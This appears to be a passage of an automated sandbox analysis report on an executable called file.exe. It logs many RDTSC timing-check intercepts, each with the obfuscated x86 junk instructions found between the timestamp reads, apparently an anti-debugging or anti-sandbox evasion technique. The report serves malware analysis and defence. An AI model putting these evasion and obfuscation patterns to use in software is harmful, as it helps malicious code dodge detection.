Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5534 second address: 7F5549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4D45034D1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5549 second address: 7F5554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4D44D05196h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5554 second address: 7F5559 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5559 second address: 7F557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F4D44D051A9h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F557D second address: 7F5583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F588A second address: 7F5898 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5898 second address: 7F589C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F589C second address: 7F58A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF15B second address: 7CF161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF28F second address: 7CF299 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5C3 second address: 7CF5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5C7 second address: 7CF5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5CD second address: 7CF5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5D3 second address: 7CF5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF5D7 second address: 613B70 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F4D45034D1Fh 0x00000012 nop 0x00000013 ja 00007F4D45034D22h 0x00000019 push dword ptr [ebp+122D0FF5h] 0x0000001f push edx 0x00000020 and cl, 00000042h 0x00000023 pop edi 0x00000024 jmp 00007F4D45034D1Eh 0x00000029 call dword ptr [ebp+122D23D5h] 0x0000002f pushad 0x00000030 clc 0x00000031 xor eax, eax 0x00000033 jmp 00007F4D45034D22h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c stc 0x0000003d mov dword ptr [ebp+122D3A39h], eax 0x00000043 mov dword ptr [ebp+122D23D0h], ebx 0x00000049 mov esi, 0000003Ch 0x0000004e mov dword ptr [ebp+122D2382h], edx 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 sub dword ptr [ebp+122D23D0h], ecx 0x0000005e mov dword ptr [ebp+122D2577h], ecx 0x00000064 lodsw 0x00000066 clc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D24D9h], edi 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 mov dword ptr [ebp+122D24F2h], ecx 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jne 00007F4D45034D1Ch 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF807 second address: 7CF80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF95D second address: 7CF961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFE3E second address: 7CFE8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4D44D0519Bh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D31F3h] 0x00000016 mov edx, 43DAA603h 0x0000001b push 0000001Eh 0x0000001d movzx ecx, si 0x00000020 nop 0x00000021 jmp 00007F4D44D0519Dh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jne 00007F4D44D05196h 0x00000030 jmp 00007F4D44D0519Eh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFE8B second address: 7CFE91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFE91 second address: 7CFE95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CFFEB second address: 7CFFF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4D45034D16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D00E3 second address: 7D0128 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4D44D0519Ah 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F4D44D0519Fh 0x0000001d mov eax, dword ptr [eax] 0x0000001f ja 00007F4D44D0519Eh 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0128 second address: 7D012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D0275 second address: 7D027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D027A second address: 7D02BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4D45034D16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ecx, 6FF6A8ADh 0x00000013 lea eax, dword ptr [ebp+1248EF0Bh] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F4D45034D18h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov dword ptr [ebp+1248090Eh], eax 0x00000039 nop 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e pop esi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D02BE second address: 7AF999 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F4D44D05196h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 jno 00007F4D44D051A8h 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F4D44D05198h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 push edi 0x00000038 and ecx, dword ptr [ebp+122D2A1Fh] 0x0000003e pop edx 0x0000003f pushad 0x00000040 mov cx, 1451h 0x00000044 stc 0x00000045 popad 0x00000046 call dword ptr [ebp+122D1BE0h] 0x0000004c jo 00007F4D44D051BDh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF999 second address: 7AF99D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FA8D9 second address: 7FA8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FAA50 second address: 7FAA5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FAA5C second address: 7FAA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FABDC second address: 7FABED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F4D45034D1Ch 0x0000000b jne 00007F4D45034D16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FABED second address: 7FABF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FAEBA second address: 7FAEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4D45034D1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FB030 second address: 7FB034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FB034 second address: 7FB05E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4D45034D16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F4D45034D32h 0x00000012 jmp 00007F4D45034D26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77EBC0 second address: 77EBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F4D44D05196h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77EBE2 second address: 77EBE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80319A second address: 80319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8038AB second address: 8038BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 jbe 00007F4D45034D16h 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8038BE second address: 8038E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F4D44D051ABh 0x0000000e jmp 00007F4D44D051A5h 0x00000013 js 00007F4D44D0519Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803C04 second address: 803C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 803C08 second address: 803C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 804189 second address: 804194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D083 second address: 77D08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808E93 second address: 808E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 808E97 second address: 808E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80914B second address: 809151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809151 second address: 809193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4D44D051A7h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F4D44D051A7h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809943 second address: 809948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809C41 second address: 809C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 809C63 second address: 809C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D20h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D3D1 second address: 80D424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4D44D051A8h 0x0000000a jmp 00007F4D44D051A5h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 ja 00007F4D44D05196h 0x00000018 pop edi 0x00000019 push esi 0x0000001a je 00007F4D44D05196h 0x00000020 jnc 00007F4D44D05196h 0x00000026 pop esi 0x00000027 pushad 0x00000028 jp 00007F4D44D05196h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80D424 second address: 80D42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81054B second address: 810559 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D44D05198h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8132B9 second address: 8132C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8132C0 second address: 8132DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4D44D0519Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8132DD second address: 8132E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816E72 second address: 816E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816E7B second address: 816E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816E82 second address: 816E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4D44D05196h 0x0000000a jp 00007F4D44D05196h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81687C second address: 816886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 816886 second address: 81689F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D051A5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81689F second address: 8168B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E9A3 second address: 81E9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81D5C7 second address: 81D5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81D5CB second address: 81D5FA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D44D05196h 0x00000008 jmp 00007F4D44D051A3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F4D44D0519Ch 0x00000014 pop ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81DA3E second address: 81DA48 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D45034D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81DD9B second address: 81DDBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4D44D051A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E70F second address: 81E715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 81E715 second address: 81E71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 822640 second address: 82265F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4D45034D27h 0x00000008 jmp 00007F4D45034D21h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82265F second address: 822663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821CB4 second address: 821CDE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007F4D45034D16h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007F4D45034D20h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821E25 second address: 821E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F4D44D05196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 821E35 second address: 821E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82222E second address: 82223A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 827A35 second address: 827A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 827A3B second address: 827A45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82846A second address: 828489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D45034D29h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 828F0F second address: 828F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4D44D051C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F4D44D051A0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829215 second address: 829219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 829523 second address: 82952D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82952D second address: 82953D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4D45034D22h 0x00000008 jl 00007F4D45034D16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82953D second address: 829545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831B85 second address: 831B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831E2F second address: 831E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Fh 0x00000009 popad 0x0000000a jmp 00007F4D44D0519Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F4D44D0519Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831E62 second address: 831E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 831E68 second address: 831E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F4D44D051A4h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4D44D051A4h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83253D second address: 832547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8326AC second address: 8326EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4D44D051A8h 0x00000011 js 00007F4D44D05196h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BAFF second address: 83BB03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
